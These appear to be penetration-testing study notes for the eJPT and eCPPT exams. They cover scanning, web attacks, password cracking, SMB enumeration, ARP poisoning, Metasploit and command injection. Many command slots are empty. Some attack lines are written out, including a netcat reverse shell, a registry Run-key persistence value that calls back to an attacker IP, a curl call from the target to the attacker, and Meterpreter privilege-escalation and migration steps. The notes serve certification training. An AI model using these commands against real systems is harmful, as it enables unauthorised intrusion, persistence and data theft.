eJPT/eCPPT Notes
Useful Notes for the eJPT and eCPPT exams.
Last updated
Useful Notes for the eJPT and eCPPT exams.
Last updated
Refer to the OWASP Testing Checklist:
Command: route
Command: ip route add <network_ip>/<cidr> via <gateway_ip> dev <network_card_name>
Recommended to change into /tmp directory
Command: python -m SimpleHTTPServer 8080
Put things in the same directory to access them via a webpage
Start a connection: nc -v hack.me 80
Make GET request:
Only works for HTTP
Command: openssl s_client -connect hack.me:443
Use -debug, -state for more info
Use -quiet to remove connection info
Crunchbase: IT startup database, information about founders, investors, employees, buyouts, acquisitions
Whois Database: Owner name, address, email, technical contacts
Passive Enumeration
Google query: "site:company.com"
Tools:
Inspecting certificates on domains may lead to more subdomains
Tools for Subdomain Enumeration
sublist3r:
Command: sublist3r -d google.com
Has brute force option that parses provided wordlist
amass:
Install:
Example: snap run amass -ip -d google.com
fping performs a ping sweep on an IP range:
Commands:
nmap can perform ping scans with the -sn flag:
Command:
nmap can fingerprint OS with -O flag, use -Pn flag to skip ping:
Command: nmap -O -Pn <targets>
TCP Connect Scan:
SYN -> <- SYN + ACK
ACK -> RST + ACK (closes connection)
Scanning Closed Port:
SYN -> <- RST + ACK (port is closed)
nmap Port Scanning
Common Flags:
-sT: TCP connect scan
-sS: SYN scan
-sV: Version detection
-Pn: Skips ping sweep, useful if network has firewalls or blocks ICMP packets
Incomplete nmap results on well-known services like a web server:
Example: βhttp?β or βtcpwrappedβ means remote host closed connection without receiving data
Use nmap --reason to get more information on why a port is open or closed
Used for scanning large networks quickly, not as accurate as nmap:
Example:
Popular vulnerability scanner, uses a client & server:
Starts with a ping sweep and port scan, then probes each daemon and cross-checks responses with a vulnerability database
Prone to false positives
Installing Nessus
Command: dpkg -i nessus.deb
Usage
Commands:
Open web interface (may need to add security exception)
Setup custom policy and scan using GUI, export results
Netcat:
Command: nc <target_ip> 80
After connecting, send a valid HTTP request:
Netcat only works on HTTP websites, for HTTPS use OpenSSL:
Command: openssl s_client -connect target.site:443
Example:
Automated Fingerprinting Tool httprint
Example: httprint -P0 -h <target_ip> -s /usr/share/httprint/signatures.txt
Flags:
-P0: Not ping web server
-h: Define host
-s: Define signature file
GET: Used to request resource
POST: Used to submit HTML form data
HEAD: Used to grab header
PUT: Used to upload file to server
You must know the size of the file you are trying to upload
Example:
DELETE: Used to remove file from server
OPTIONS: Used to query web server for available HTTP verbs
Command: nc -lvp 8888
Connect to nc listener: nc -v 127.0.0.1 8888
To make connection UDP: Add -u
Sending file over nc:
Command: cat tobesent.txt | nc -v 127.0.0.1 8888
Reverse Shell:
Command: nc -lvp 1337 -e /bin/bash
GUI based directory enumerator
Command line based directory enumerator
Basic Usage
Commands:
Common Flags
-a: Change user agent to make request look like they come from a browser, useragentstring.com
-c βCOOKIE: XYZβ: Specifies cookie in request
-u βadmin:passwordβ: User authentication in request
-H βMy Header: My contentβ: Add header into request
-r: Turn off recursive search βsub directoriesβ
-z 1000: Changes speed to one request a second
-s: Silent mode: only displays items that were found
-X β.php,.bakβ: Append extensions to word list
-x extensions.txt: Include file with extensions
-o results.txt: Saved results in output file
Run dirb through Proxy βBurpβ
Command: dirb http://google.com -p http://127.0.0.1:8080
Command:
-u for user
-p for password (no space)
site: Only include results from specified host
intitle: Filters results based on title of page
inurl: Text included in URL
filetype: Used to search for specific file extensions .pdf, .xls
AND, OR, &, |: Logical operators for queries
-: Used to filter out words
Occurs when web application uses unfiltered user input to build the output content displayed to its end users; this lets an attacker control the HTML and Javascript code, thus attacking the application user.
Any parameter coming from client side of web app such as:
Request headers
Cookies
Form inputs
POST parameters
GET parameters
Alert that XSS is there:
Steal cookies:
Steal cookies and send them to attacker controlled site:
Command:
In order for a web app to use database it must:
Connect to database
Submit query
Retrieve results before applications can use results
Command:
Test every supplied user input used by the web app:
GET parameters
POST parameters
HTTP headers:
User-Agent
Cookie
Accept
String terminators: ', "
Commands: SELECT, UNION
SQL Comments: #, --
Commands:
SELECT user(); // displays current database user
select substring(user(), 1, 1) = 'r'; // returns a true or false (0 or 1), effective for learning more about what db contains
Commands:
Open source penetration testing tool that automates process of detecting SQL injection
Capable of both detecting and exploiting
Always recommended to test by hand first to avoid crashing DB
Command:
Command:
Test the id parameter of the GET request for view.php, tells sqlmap to use UNION based injection
To test POST request:
Command:
-v3: Displays queries used
--users: Enumerate users
--dns: See what dbs are connected
-D dbname --tables: Specify db and enumerate tables
-T specified table --columns: Grab columns from specified tables
-C specify columns, column2 --dump: Dump records of specified columns
--data='user=a&pass=a': POST injection, grab post info from burp-suite
Use auxiliary/scanner/mssql/mssql_login
On Windows machine:
On attacker machine:
On attacker machine:
On Windows machine:
Start listener on attacker machine
Open regedit on Windows machine
Navigate to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Right-click and add new string value, name ncat, edit string value and add path to ncat binary along with reverse shell syntax: "C:\Windows\System32\ncat.exe <attacker_ip> <port> -e cmd.exe"
Restart victim machine to activate shell
After acquiring /etc/passwd (hashed passwords on Linux system) & /etc/shadow (users on Linux system), John needs user and pass to be in the same file:
Command:
Brute Force:
To display passwords recovered by John:
Cracked passwords stored in file
Dictionary Attack
Command:
Good wordlist to install:
Tables containing passwords that have been pre-hashed saving time and computational power.
Ophcrack: Rainbow table password cracking tool
Tools used for cracking network services such as HTTP, SSH, FTP, etc.
Syntax:
Configuring Hydra
Inspect page source
Figure out how credentials are being sent to server (POST)
Figure out names of parameters being sent (pwd, usr)
Example Webpage:
-L: List of user names
-P: List of passwords
-f: Hydra will stop after first credential found
-V: Verbosity
Example SSH:
\\servername\ShareName\file.net
\\ComputerName\C$: Lets admin access volume on local machine
\\ComputerName\admin$: Points to the Windows installation directory
\\ComputerName\ipc$: Used for interprocess communication
An anonymous connection to an inter-process communication network service on Windows-based computers:
Check and see if the target has any file server enabled
nbstat -A 10.123.162.2 or nbstat \? for help
The third line down will tell you if the target is sharing any files in the <> field
If file server is enabled, enumerate shares with NET VIEW
NET VIEW <target_ip>
Try to connect to share
NET USE \\<target_ip>\IPC$ '' /u:'' (connect to the IPC$ share without authentication)
enum:
Script that automates enumeration of shares
Commands:
winfo:
Another enumeration tool
Command:
nmblookup -A <target_ip>
smbclient -L \\:<target_ip> -N
Use instead: smbclient -L <WORKGROUP> -I <TARGET_IP> -N -U "" (allows you to see services on target, -N forces no password)
smbclient //<target_ip>/IPC$ -N
Use instead: smbclient \\\\<target_ip>\\<target_share> -N (connects to IPC share without authentication)
enum4linux script:
Enumerates shares
Brute force enumeration:
samrdump.py:
Enumerates info about users using null sessions
Command:
nmap smb enumeration:
Commands:
Works by changing the ARP caches on two network nodes. Attacker sends unsolicited ARP packets to the two nodes telling them to route traffic through the attacker computer.
Command:
Tool used for ARP poisoning:
Example:
-i: NIC
-t & -r: Victims
You can then run Wireshark to see the traffic
Requirements Before Use
Commands:
Command: msfconsole
Command: show -h
Command: search <search_term>
Command: show exploits
Command: use exploit/windows/ftp/turboftp_port
Command: back
Command: info
Command: options
Command: set
Command: show payloads
Command:
Command: exploit
Commands:
Commands:
Command:
Search for Meterpreter Payloads
Command: search meterpreter
Put Session in Background
Command: background
List Current Sessions
Command: sessions -l
Resume Session
Command: sessions -i 1
Get Info About Machine
Command: sysinfo
Network Info
Command: ifconfig
Routing Tables
Command: route
Get Current User ID
Command: getuid
Elevate Privilege
Command: getsystem
If operation fails, try the following:
Background session
Search bypassuac
Use exploit /windows/local/bypassuac
Set session
Exploit
Uploading/Downloading Files
Command: upload <path> or download <path>
Use Standard OS Shell
Command: shell
See All Processes Running
Command: ps
See Process Meterpreter is Attached to
Command: getpid
Check UAC
Command: run post/windows/gather/win_privs
Migrating Process to be Stealthy
When migrating process, the new process must have the same level of privilege:
Command: ps -U SYSTEM
This command will search for all other processes with system-level privilege:
Command: migrate <pid>
Test bash sleep command to see if page is delayed:
Command: sleep 5
Use Wireshark to pick up ICMP packets:
Command: ping <attacker> -c 5
May need to use URL encoding to keep syntax intact
Get Paths to Installed Programs
Command: echo $PATH
Look for Specific Tools
Command: which <tool>
See if You Can Establish TCP Connection
On Attacker:
Setup listener with nc: nc -lvp 53
On Target:
Establish TCP with curl: curl http://<attacker_ip>:<attacker_port>
Test Commands with Curl
Commands:
Test Commands with Spaces in the Output with Curl
Commands:
Command above will not display properly because there are spaces in the output, need to encode to see full output:
Command:
To decode:
Command:
Downloading Files with Curl
Command:
Uploading Files
Start simple Python HTTP server:
Command:
All files in directory you start Python server in will be available via server
Generate payload & store it in server directory:
Command:
Get payload on victim machine:
Command:
Test if file was uploaded by downloading it:
Command:
Running payload:
Command:
Spawning a Better Shell:
Command:
Spawns bash environment
There are lots of shells you can easily spawn, look them up βspawning tty shellβ:
Command:
Command:
: Search cached DNS subdomains
: Collect SSL certificates and valid domain names